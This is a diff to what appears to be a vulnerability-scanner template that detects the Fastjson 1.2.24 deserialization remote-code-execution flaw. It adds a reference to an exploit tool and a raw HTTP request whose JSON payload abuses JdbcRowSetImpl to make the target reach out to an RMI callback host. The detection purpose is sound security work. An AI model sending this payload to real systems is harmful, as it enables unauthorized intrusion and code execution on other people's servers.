--- a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml
+++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
     - https://www.freebuf.com/vuls/208339.html
-    - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
+    - https://github.com/wyzxxz/fastjson_rce_tool
   tags: fastjson,rce,deserialization
 
 requests:
@@ -25,10 +25,22 @@ requests:
             }
         }
 
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+           "@type":"com.sun.rowset.JdbcRowSetImpl",
+           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
+           "autoCommit":true
+        }
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms DNS Interaction
+        part: interactsh_protocol   # Confirms DNS Interaction
         words:
           - "dns"
 
